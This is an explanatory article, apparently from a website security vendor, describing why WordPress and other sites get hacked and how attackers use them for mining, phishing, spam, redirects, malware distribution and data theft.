Why is my Website being Attacked?

Hacked Websites Target Your Customers

Malicious software, which is used to infect websites, gather data and in some cases even hijack computer resources. A site where an attacker has gained an access to can be used to redirect traffic, infect visitors with unwanted software and lately even to use the visitor’s computer resources to mine untraceable cryptocurrencies.

There are thousands of different types of malware and thousands of different ways to infect your website, which is mostly all done by automated hacking tools. What they all have in common, is that the hacked websites are mostly used to retarget your potential customers, your website visitors.

The number of hacked sites rises rapidly

“There was a 32 percent increase in the number of hacked sites in 2016 compared to 2015.”

– Google Webmaster Central Blog

Botnet-enabled attacks on vulnerable Web applications in fact accounted for more breaches (571) than any other vector in Verizon’s 2017 Data Breach Investigations Report. In March 2016 Google announced that more than 50 million websites world-wide are infected or malicious. In March 2015, that number was 17 million.  The number of new Web application vulnerabilities published in 2017 was 212% greater than the number disclosed in 2016.

Business Reputation Loss and Drop In Revenue

Because of a hacked website, a customer loses trust and therefore it will lead to company reputation loss, which for e-commerce can often mean an end of the business.

When your site is hacked and added to different blacklists, the potential customer cannot reach to the products or services being offered.

Google and other search engines (for who you typically don’t want to be on the naughty list) warn your customers and restrict them from entering your website. Lately, Google, for example, has stepped up the game even more. Starting from July 2018, every website without SSL (HTTPS) will be marked as insecure and therefore receive an SEO penalty, which makes it harder for your company to reach to new customers.

Anyways, if a potential customer visits your site and gets warned or infected, there is an extremely low chance that the customer will ever visit your site again.

Website clean-up is more expensive than protection

As a website owner discovering that your website has been hacked, the first thing to do is to search “How to  clean up hacked site”. Yes, you will find a lot of blog posts and articles about it, but they will all eventually recommend you the same thing – have a professional to do it for you.

The process of a malware clean-up of a website is much more about knowing the vulnerabilities and knowing the way of a hacker mind, than just manually going through the files. Malware is often hidden to the original files and to the database and attackers put a lot of effort into making sure you won’t be able to remove their backdoors so easily.

Expensive, indeed. Not just the malware clean-up service itself, but the lost revenue and reputational damage are what can eat up a lot of time and money to recover from.

Website gets blacklisted

What is the Blacklist?

Without using the exact term “blacklist,” Google quarantines at least 10,000 suspicious websites each day. You can recognize the sites by seeing the display message “This site may harm your computer” in search results. This will serve as a warning that prompts most users to stay away. Consumers are grateful for the warning. The business panics. (source: Forbes)

Cleaning up your site is only the first part of becoming relisted on Google. Before you put your site out there again, be sure you have measures in place to prevent a recurrence. You may be susceptible to the same cybercriminals who infected your site the first time if you don’t step up your security measures.

Using Your Server to Run Their Own Programs

If you’re running a WordPress site, your web server is most likely a fully functioning Linux server with MySQL and PHP installed. Depending on your hosting situation, it may also have a meaningful amount of processing power.

Cryptocurrency Mining

In December, we wrote about a massive cryptomining campaign targeting WordPress sites. In the most intense period of attacks we had ever recorded, an attacker was compromising sites and using them to both attack other WordPress sites and to mine for Monero, a cryptocurrency that can be mined efficiently using web server hardware.

I encourage you to read the article if you haven’t already. We were able to identify how the the attackers were controlling the compromised servers and discovered evidence that they had earned almost $100k via their mining efforts.

Leveraging Your Reputation

In November, we wrote about the fact that your site reputation makes you a target. I encourage you to read it along with the post that inspired it, by Troy Hunt.

Hosting Phishing Pages

A phishing page is one that attempts to fool you into sharing sensitive information, like your password, credit card number or social security number. An example of a phishing page is a fake login page that gives you the impression you are on, for example, the GMail login screen. You enter your credentials and the attacker logs them and can now sign into your real GMail account and steal data.

In January 2017, we wrote about a new and highly effective GMail phishing technique that was having a wide impact.

Your site has a squeaky clean reputation. When attackers host phishing pages on your site, services like Google Safe Browsing that would normally warn users about suspicious websites won’t know to alert visitors to the danger of the phishing page hosted on your site.

Hosting Spam Pages and Injecting Spammy Links

Your site is legitimate, so search engines like Google assume that your content, including outbound links, is also legitimate. Attackers love to plant SEO spam in the form of pages and links on your site, boosting SEO rankings for their malicious businesses.

A great example of this is the supply chain attack we discovered back in September that spanned 4.5 years and impacted 9 WordPress plugins. In our blog post about this SEO spam campaign, we exposed how someone purchased the plugins and then used them to embed spammy links in the sites that were running them. The attacker used these links to improve search engine rankings for websites offering payday loans, escort services and other shady things.

It’s important to remember that while your site alone isn’t capable of boosting an attacker’s SEO results, thousands of compromised sites can really move the needle.

Sending Spam Email

Getting spam email past spam filters is a difficult endeavor. Email clients use myriad techniques to identify and block spam. Almost all spam filters rely on IP blacklists to block everything from IPs known to send spam.

That’s where your web server comes in. Not only does your server have all of the hardware and software spammers need, but the reputation of your IP is likely perfect. By sending spam from your web server, cybercriminals have a much better chance of getting their spam delivered.

Eventually, spam filters pick up on what is happening and blacklist your IP as well, so the attacker simply moves on to the next victim, leaving the reputation of your IP address in ruins.

Attacking Other Sites

Sometimes attackers will compromised WordPress sites to attack additional sites. We saw hackers use this approach in the cryptocurrency mining attack we discussed earlier in this article, where an attacker was controlling a botnet made up of thousands of other people’s WordPress sites that were simultaneously mining for cryptocurrency and attacking other websites. Your website is an attractive attack platform because your IP address is likely not on any blacklists.

Hosting Malicious Content

Hackers will sometimes use your web server to host malicious files that they can call from other servers. They are essentially using your hosting account as a file server.

Leveraging Your Site Traffic

Malicious Redirects

One very common thing attackers do with hacked websites is add redirects to the content. Visitors to your site don’t even have to click on a hyperlink to visit the spam site: the redirect will just take them there directly. In some cases, attackers will go so far as to redirect all of your traffic to malicious sites. But in most cases, they employ measures to avoid detection, only redirecting traffic to specific URLs or for specific browsers or device types.

In August 2017 we wrote about the TrafficTrade infection which injects malicious JavaScript into websites and redirects visitors to pages that host spam and malicious browser plugins.

Defacements

In some cases, the attacker just wants to get their message out. By taking over your website, they are able reach your website visitors, at least until you figure out what they’ve done. Attacks of this nature often represent a political movement or are just looking for “street cred” in the hacker community.

In February last year, we saw a huge WordPress defacement campaign that exploited a WordPress REST API vulnerability. It grew at incredible speed over a period of days, and after just 24 hours we had tracked 19 separate attack campaigns significantly impacting WordPress sites.

Distributing Malware

One especially nefarious way attackers monetize hacked websites is to use them to spread malware. They install website malware that installs malware on your visitors’ computers or devices when they visit your site.

As a site owner, this is especially scary, as not only do you risk having your site flagged by search engines and other blacklists, but your visitors are not going to be happy with you. Your reputation, both online and with your site visitors, could be damaged for a long time. In addition, a hacked website can have a long-term negative impact on your search engine rankings.

Stealing Data

Even if you don’t accept credit cards on your site, an attacker may still find valuable data to steal. For example, if you capture other data via forms on your site, there might be something there worth taking. Additionally, attackers can use stolen username and password pairs to try to log in to other sites.

Ransomware

We’ve learned over the years that websites almost always represent something that matters to people, even if it’s not a business site. Unfortunately, cybercriminals have, too. Last year we wrote about a ransomware attack campaign targeting WordPress sites. While we haven’t seen much of this lately, we believe the threat of WordPress ransomware will continue and will increase in future.